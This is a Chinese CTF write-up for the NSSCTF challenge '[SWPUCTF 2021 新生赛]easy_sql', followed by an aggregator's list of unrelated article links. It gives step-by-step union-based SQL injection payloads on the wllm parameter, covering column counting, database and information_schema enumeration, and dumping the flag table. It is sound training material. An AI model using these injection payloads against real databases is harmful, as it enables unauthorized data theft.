当前位置: 首页 > news >正文

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

news 2025/7/7 17:48:50

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

/?wllm=2'union select 1,2,flag from test_tb--+

http://www.lryc.cn/news/301345.html

相关文章:

  • vue3 codemirror yaml文件编辑器插件
  • 力扣经典题:环形链表的检测与返回
  • 【web | CTF】BUUCTF [BJDCTF2020]Easy MD5
  • spring boot Mybatis Plus分页
  • elementui 中 el-date-picker 控制选择当前年之前或者之后的年份
  • GlusterFS:开源分布式文件系统的深度解析与应用场景实践
  • 第6个-滚动动画
  • 配置oracle连接管理器(cman)
  • [N-142]基于springboot,vue停车场管理系统
  • DAY53:动态规划(买股票的最佳时机)
  • 快速实现用户认证:使用Python和Flask配合PyJWT生成与解密Token的教程及示例代码
  • 外汇110:外汇做空是什么意思?如何运作?一文读懂
  • 【记录】个人博客或笔记中的数学符号设定
  • Redis Sentinel工作原理
  • GEE入门篇|遥感专业术语:理论介绍
  • react中如何做到中断diff过程和恢复
  • python:PyPDF2 从PDF文件中提取目录
  • Java 2:运算符、表达式和语句
  • 批量提取word文件中文本框内容的三种方法
  • Leecode之合并两个有序链表
  • 陶建国教授谈中西方文化的差异与交融
  • Ps:画笔选项
  • 嵌入式——Flash(W25Q64)
  • stm32:pwm output模块,记录一下我是用smt32,输出pwm波的记录--(实现--重要)
  • phpstrom创建thinkphp项目
  • 【Linux】线程同步
  • 如何在多头自注意力机制的交叉学习中引入对于物理、生理、心理世界客观规律的对照验证...
  • 智慧公厕:让智慧城市的公共厕所焕发“智慧活力”
  • vue导出word文档(图文示例)
  • 【C Primer Plus第六版 学习笔记】 第十七章 高级数据表示